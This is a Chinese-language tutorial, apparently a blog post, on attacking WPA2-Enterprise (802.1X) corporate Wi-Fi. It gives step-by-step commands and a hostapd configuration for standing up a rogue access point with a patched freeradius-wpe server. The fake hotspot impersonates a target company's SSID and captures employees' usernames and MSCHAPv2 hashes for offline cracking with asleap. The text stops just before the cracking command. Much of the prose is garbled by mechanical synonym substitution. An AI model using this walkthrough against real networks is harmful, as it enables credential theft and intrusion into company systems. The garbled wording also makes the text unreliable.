針對(duì)開(kāi)放式(沒(méi)有暗碼)無(wú)線網(wǎng)絡(luò)的企業(yè)進(jìn)攻，我小我私家感受較量經(jīng)典的進(jìn)攻方法有2種，一種是eviltwin，一種是karma。karma應(yīng)該是eviltwin進(jìn)攻手法的進(jìn)級(jí)版，進(jìn)攻者只需要簡(jiǎn)樸的監(jiān)聽(tīng)客戶端發(fā)的ssid探測(cè)和響應(yīng)包就可以實(shí)現(xiàn)中間人了，受害者很少會(huì)有察覺(jué)。并且坊間曾有一個(gè)錯(cuò)誤的認(rèn)識(shí)，認(rèn)為埋沒(méi)的ssid是不受karma影響的。可是實(shí)際環(huán)境是，客戶端假如曾經(jīng)毗連過(guò)埋沒(méi)的ssid，，也會(huì)廣播這些網(wǎng)絡(luò)的探測(cè)包。盡量karma這種進(jìn)攻方法已經(jīng)有10多年的汗青了，可是在MAC OSX，ubuntu，老版本的andorid系統(tǒng)上依然有效。win7的默認(rèn)設(shè)置居然是防護(hù)karma進(jìn)攻的。

對(duì)加密的無(wú)線網(wǎng)絡(luò)，針對(duì)小我私家網(wǎng)絡(luò)，許多是利用wpa2-psk預(yù)共享密鑰的要領(lǐng)來(lái)限制會(huì)見(jiàn)。而公司的無(wú)線網(wǎng)絡(luò)有利用wpa2企業(yè)認(rèn)證的，也有利用radius處事提供獨(dú)立的用戶名和暗碼來(lái)實(shí)現(xiàn)802.1x尺度認(rèn)證的。

---

我這里是的進(jìn)攻是利用hostapd飾演一個(gè)無(wú)線會(huì)見(jiàn)點(diǎn)，然后通過(guò)打補(bǔ)丁的freeraidus wpe來(lái)捕獲暗碼hash，最后用asleep來(lái)離線破解暗碼，來(lái)反抗相對(duì)安詳?shù)睦?strong>radius處事器提供獨(dú)立的用戶名和暗碼實(shí)現(xiàn)的802.1x認(rèn)證的企業(yè)無(wú)線網(wǎng)絡(luò)情況。

所需設(shè)備：

TP-LINK TL-WN821N
Kali 1.1.0

首先安裝freeradius-wpe,既可以利用dpkg直接安裝freeradius-server-wpe_2.1.12-1_i386.deb,也可以通過(guò)源碼編譯來(lái)安裝，通過(guò)deb包安裝要領(lǐng)的呼吁如下：

wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb
dpkg --install freeradius-server-wpe_2.1.12-1_i386.deb
ldconfig
cd /usr/local/etc/raddb/certs
./bootstrap && ldconfig

通過(guò)源碼安裝的步調(diào)如下：

git clone https://github.com/brad-anton/freeradius-wpe.git
wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2
tar jxvf freeradius-server-2.1.12.tar.bz2
patch -p1 < ../freeradius-wpe.patch
./configure
make install

然后執(zhí)行radiusd -X開(kāi)啟debug模式驗(yàn)證是否安裝樂(lè)成，假如運(yùn)行此呼吁的時(shí)候提示

Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory

則需要成立相應(yīng)的目次

[email protected]:/usr/local/etc/raddb/certs# mkdir -p /usr/local/var/run/radiusd/

接下來(lái)安裝hostapd，呼吁如下：

wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/hostapd/
cp defconfig .config
make

假如安裝的時(shí)候提示：

../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1

則需要安裝libnl開(kāi)拓包，呼吁如下：

[email protected]:/hostapd-2.0/hostapd# sudo apt-get install libnl1 libnl-dev

然后編輯hostapd-wpe.conf文件，如下

interface=wlan0
driver=nl80211
ssid=corp-lobby
country_code=DE
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP

實(shí)際操縱需要修改的處所只有ssid項(xiàng)，假如你的方針企業(yè)無(wú)線網(wǎng)絡(luò)的ssid叫corp-lobby，則修改ssid=corp-lobby,運(yùn)行 hostapd -dd hostapd-wpe.conf 開(kāi)啟偽造的無(wú)線熱點(diǎn)

這時(shí)候假如有企業(yè)員工在你四周，他的手時(shí)機(jī)自動(dòng)毗連你的偽造的無(wú)線熱點(diǎn)，你就可以通過(guò)

tail -f /usr/local/var/log/radius/freeradius-server-wpe.log

看到抓到的用戶名和MSCHAPv2的響應(yīng)hash和挑戰(zhàn)hash。

有了challenge和response，就可以利用asleep東西來(lái)基于字典的暴力破解，呼吁如下